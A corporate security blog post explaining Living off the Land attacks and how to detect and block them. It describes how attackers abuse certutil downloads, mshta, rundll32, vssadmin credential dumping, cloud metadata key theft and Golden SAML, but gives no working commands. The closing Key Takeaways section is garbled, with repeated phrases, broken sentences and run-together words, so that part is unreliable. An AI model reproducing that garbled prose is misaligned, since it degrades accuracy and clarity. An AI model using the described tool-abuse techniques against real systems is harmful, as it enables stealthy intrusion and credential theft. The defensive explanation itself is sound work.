Living off the Land Attacks (LotL): When Hackers Use Your Tools Against You

SHILPI MONDAL| DATE: JANUARY 09 ,2026

We used to worry about "files."

In the old days and by that, I mean just a few years ago defense was largely about spotting the anomaly on the disk. A strange .exe, a malicious payload, a signature that didn't match the known good. But the game has changed entirely. Why would an attacker spend time and money developing custom malware that might get flagged by your antivirus when they can simply use the tools you’ve already paid for, installed, and trusted?

This is the reality of Living off the Land (LotL). It’s not just a trend; it’s the dominant tradecraft of modern intrusions. In fact, recent analysis suggests that 84% of high-severity cyberattacks now leverage legitimate system tools, marking a complete departure from the malware-heavy intrusions we spent the last decade fighting.

For IT leaders and CIOs, this is the wake-up call: The absence of a malicious file is no longer an indicator of safety.

The "Fileless" Shift: Why Foraging Beats Coding

At its core, LotL is about "foraging." Attackers gain access to your environment and, instead of bringing their own weapons, they pick up yours. They operate primarily in system memory (RAM), avoiding the disk entirely to evade traditional scanning. Think of it from the attacker's ROI perspective. Developing a zero-day exploit is expensive. Using powershell.exe which is already whitelisted on every machine in your fleet is free. As noted by CrowdStrike, this technique allows threat actors to blend seamlessly with legitimate administrative tasks, making their activity nearly indistinguishable from a sysadmin running a routine update. The mechanism is terrifyingly simple. In a traditional attack, your security stack looks for "known bad." In an LotL scenario, the executable is a signed, trusted component. The malicious intent isn't in the binary; it resides in the command passed to it.

The Windows Arsenal: LOLBins in Action

Windows is the primary theater for these operations because it is packed with powerful administrative utilities what we call LOLBins (Living Off The Land Binaries).

Take PowerShell, for instance. It is the "Swiss Army Knife" of these attacks. Because of its deep integration with the .NET framework and Windows API, it allows attackers to perform complex tasks like credential dumping and data exfiltration entirely in memory. It’s no surprise that PowerShell appears in approximately 71% of all documented LotL attacks, according to Vectra AI.

But it’s not just PowerShell. We see attackers getting creative with mundane utilities:

Certutil.exe: 

Nominally used for certificate management, it’s a favorite for stealthy payload delivery. Attackers use it to download files via the -urlcache flag, bypassing standard browser controls.

Mshta.exe: 

We've seen this used to execute malicious JavaScript or VBScript by passing a URL directly to the binary.

Rundll32.exe: 

Perhaps the most famous LOLBin, it loads and runs functions within DLL files, frequently executing payloads disguised as standard libraries.

The LOLBAS project documents these abuses extensively, highlighting just how many Microsoft-signed components can be repurposed. If you aren't monitoring how these specific binaries are being invoked, you're flying blind.

Beyond the Desktop: Living Off the Cloud (LotC)

Here is where the threat landscape gets even stickier. As we’ve migrated our infrastructure to AWS, Azure, and GCP, the attackers have followed. They are now "Living off the Cloud" (LotC). Out here, hackers twist built-in cloud controls and data feeds to their advantage. Take one hacked server - it could hit up Amazon's metadata system, snagging short-lived access keys on the fly. That backdoor opens paths straight into storage bins or database engines, all while skipping any need to brute-force passwords.

We are also seeing a rise in what I call "identity-based" LotL. The SolarWinds breach was a masterclass in this. While the initial entry was a poisoned update, the persistence mechanism was the "Golden SAML" technique. As CyberArk explains, this allowed attackers to forge SAML tokens and impersonate any identity in the organization. It was a "fileless" identity attack that left no trace on the endpoint, effectively allowing them to hide in plain sight within the federation stack.

The Stealth of Volt Typhoon: A Warning for Critical Infrastructure

If you need a concrete example of the stakes, look no further than Volt Typhoon. This PRC-sponsored campaign didn't just use LotL techniques; they lived them.

Their hallmark was operational security so tight that, in some cases, they maintained access to victim environments for at least five years before discovery. Few signs of custom malware showed up at all. Built-in Windows tools did most of the work - commands such as net user, ping, and systeminfo helped trace network layouts. Volume shadow copies gave up passwords when vssadmin came into play.

Oddly enough,their messages traveled via hacked home routers, making it seem like each signal came from normal neighborhood devices instead. As the CISA and FBI joint advisory detailed, this is the future of state-sponsored tradecraft: low-and-slow, using your own infrastructure to persist indefinitely.

Strategies for Defense: Stripping the Land

So, how do we defend against tools we need to do our jobs? We can't just delete PowerShell. The answer lies in moving away from simple allow-listing and toward behavioral baselining. We have to stop trusting the tool and start scrutinizing the usage.

Enable Script Block Logging:

You cannot detect what you cannot see. Standard logging often misses the context of a PowerShell script. Enabling PowerShell Script Block Logging (Event ID 4104) is non-negotiable. Code gets recorded the moment it runs, regardless of sneaky tricks like Base64 scrambling. Seeing what someone meant to do matters more than just catching the act itself.

Tune Your EDR for Behavior:

Your EDR needs to be tuned to your specific environment. It should flag unusual parent-child process relationships. For instance, MicrosoftTeams.exe should generally not be spawning cmd.exe. Kaspersky suggests establishing strict baselines for administrative activity and setting alerts for deviations. If an admin account uses certutil from a non-standard workstation at 2 AM, that’s an incident.

Reduce the Surface Area:

Finally, practice aggressive application control. If a specific department doesn't need `bitsadmin.exe`, block it using AppLocker or Windows Defender Application Control (WDAC). As DeepStrike points out, effective prevention requires limiting the availability of these powerful tools to only those who strictly require them.

Conclusion

Living off the Land attacks represent a fundamental shift in the attacker's mindset. They have realized that the best camouflage is the environment itself. By weaponizing the very tools we use to manage and secure our enterprises, they have eroded the safety net of traditional, file-based security.

But this isn't a lost cause. It just requires a pivot in how we think about trust. We must treat our administrative tools with the same level of scrutiny we apply to external traffic. We need high-fidelity logging, smarter behavioral analytics, and the courage to restrict convenience for the sake of security.

At IronQlad, we help organizations harden their environments against these exact types of advanced threats. If you're unsure whether your current logging strategy can detect a "fileless" intrusion, it might be time for a deeper conversation.

KEY TAKEAWAYS:

• The way things work has changed: really bad computer attacks, about 84 percent of them use the computers own tools instead of special malware so just looking for bad software is not enough to stop them. The Paradigm Has. The Paradigm is all, about how The Paradigm uses the systems own tools to attack.

• PowerShell is really important: Because it is the used thing by bad people showing up in more, than 70% of LotL attacks it is very necessary to keep an eye on PowerShell when it is running and this can be done by using something called Script Block Logging. PowerShell is something that needs to be watched.

• The cloud is a place for people to explore and it is also where bad people are going now. These bad people have found ways to use tricks in the cloud, which we can call LotC to stay hidden without leaving any files behind. They are doing this by using information that is stored with files and by tricking the systems that are used to say who people are, like SAML. The cloud is really the new frontier and these attackers are using LotC techniques to get what they want.

• Behavior Over Signatures: To really defend ourselves we need to understand what the administrative behavior of our system is like when it is working normally. Then we can flag things that do not look right like when a parent process and a child processre talking to each other in a way that is not usual for our system. This is important because it helps us find behavior, such, as unusual parent-child process chains and stop it before it causes problems.

• Hardening is Essential: Reducing the attack surface by blocking unnecessary binaries (AppLocker/WDAC) and restricting administrative privileges is the most effective preventative measure.